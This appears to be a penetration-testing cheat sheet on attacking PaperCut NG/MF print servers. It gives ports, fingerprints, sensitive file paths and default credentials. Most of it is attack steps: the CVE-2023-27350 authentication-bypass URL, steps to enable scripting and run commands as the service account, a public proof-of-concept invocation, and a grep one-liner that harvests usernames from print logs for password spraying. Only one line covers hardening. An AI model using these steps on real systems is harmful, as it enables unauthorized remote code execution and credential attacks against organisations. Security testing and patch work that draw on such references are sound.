PaperCut NG/MF
Print-management server, admin UI on 9191/9192. Print logs leak usernames for spraying, and CVE-2023-27350 is an unauthenticated auth bypass that reaches the scripting engine for RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
9191 | tcp | PaperCut admin/user web (HTTP) |
9192 | tcp | PaperCut web (HTTPS) |
Fingerprint
- 'PaperCut MF' / 'PaperCut NG' login at /app, version in the footer
Key files
| Path | Holds | Sensitive |
|---|---|---|
server/logs/ | print job logs — usernames, document names | sensitive |
server/data/internal.db | internal user accounts/hashes | sensitive |
Default / weak creds
admin is the default built-in account
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2023-27350 | Unauthenticated auth bypass → RCE via the built-in scripting (SetupCompleted) |
| CVE-2019-8903 | Unauthenticated access to admin pages |
Exploitation primitives
- Harvest usernames from print logs, then password-spray AD with them
- CVE-2023-27350: bypass login via /app?service=page/SetupCompleted, enable 'User/Group Sync' or device scripting, run a command as the PaperCut service account
Overview
PaperCut manages printing; its admin console sits on 9191. On a box it’s useful two ways: the print logs leak usernames (great for spraying) and CVE-2023-27350 bypasses auth straight to RCE.
Auth bypass → RCE (CVE-2023-27350)
Walk through the setup-wizard bypass to land in the admin console:
http://<TARGET>:9191/app?service=page/SetupCompletedThen enable Options → Advanced → Enable external user lookup / device scripting and trigger a script that runs as the PaperCut service user (often SYSTEM on Windows). A public PoC automates it:
python3 CVE-2023-27350.py --url http://<TARGET>:9191 --cmd "cmd /c whoami"Harvest usernames
Read the print logs for valid account names to spray:
ls server/logs/ && grep -hoE '[a-z]+\.[a-z]+' server/logs/*.csv | sort -uHardening
Patch to ≥ 20.1.7 / 21.2.11 / 22.0.9, restrict the admin port, and don’t expose print logs.